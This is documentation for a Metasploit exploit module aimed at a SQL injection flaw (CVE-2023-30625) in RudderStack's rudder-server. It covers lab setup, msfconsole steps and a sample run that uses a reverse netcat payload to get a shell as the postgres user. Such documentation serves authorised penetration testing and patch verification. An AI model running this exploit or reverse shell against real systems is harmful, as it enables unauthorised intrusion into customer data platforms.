adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
3da170a43c7f288fe9bc88fe325da488733acac3
metasploit-gs/documentation/modules/exploit/multi/http/rudder_server_sqli_rce.md
T
Ege Balcı 0996938113 Add note for Windows compatibility
2023-07-28 17:06:38 +02:00

3.0 KiB
Raw Blame History

Vulnerable Application

RudderStack is an open-source Customer Data Platform (CDP) that helps organizations collect, unify, and route customer data to various destinations. A Customer Data Platform is a software system that centralizes and manages customer data from multiple sources, providing a unified view of customer interactions and behaviors. RudderStack is an independent, stand-alone system with a dependency only on the database (PostgreSQL). Its backend is written in Go with a rich UI written in React.js.

This Metasploit exploit module targets a SQL injection vulnerability (CVE-2023-30625) in RudderStack's rudder-server, an open-source Customer Data Platform (CDP). The vulnerability affects versions of rudder-server before 1.3.0-rc.1. By exploiting this flaw, an attacker can execute arbitrary SQL commands, potentially leading to Remote Code Execution (RCE) since the rudder role in PostgreSQL has superuser permissions by default. This issue was discovered and reported by GHSL team member @Kwstubbs (Kevin Stubbings). Check here for full disclosure writeup.

Note: The backend code of rudder-server is written with Golang and can also be compiled for Windows. Due to the insufficient build instructions for Windows platforms, the Windows target is disabled in this exploit module.

Testing

For installing the vulnerable version follow the steps below,

  1. Download docker-compose.yml file.
  2. Replace <your_workspace_token> in this file with your workspace workspace-token Check here for obtaining workspace-token.
  3. Edit rudder-server:latest version as rudder-server:1.2.5 inside the docker-compose.yml file.
  4. Run docker compose -f rudder-docker.yml up -d

After these steps the rudder-server API will be exposed on the http://localhost:8080/ address.

Verification Steps

  1. msfconsole
  2. Do: use exploit/multi/http/rudder_server_sqli_rce
  3. Do: set RHOST [IP]
  4. Do: set RPORT [PORT]
  5. Do: check
  6. You should get a shell.

Options

Scenarios

msf6 > use exploit/multi/http/rudder_server_sqli_rce 
[*] Using configured payload cmd/unix/reverse_netcat
msf6 exploit(multi/http/rudder_server_sqli_rce) > set rhosts 192.168.1.20
rhosts => 192.168.1.20
msf6 exploit(multi/http/rudder_server_sqli_rce) > set lhost 192.168.1.10
lhost => 192.168.1.10
msf6 exploit(multi/http/rudder_server_sqli_rce) > set lport 4444
lport => 4444
msf6 exploit(multi/http/rudder_server_sqli_rce) > run

[*] Started reverse TCP handler on 192.168.1.10:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[!] Cannot reliably check exploitability. ForceExploit is enabled, proceeding with exploitation.
[*] Detected rudder version: Unknown
[*] Triggering RCE via crafted SQL query...
id
uid=70(postgres) gid=70(postgres) groups=70(postgres),70(postgres)
Reference in New Issue View Git Blame Copy Permalink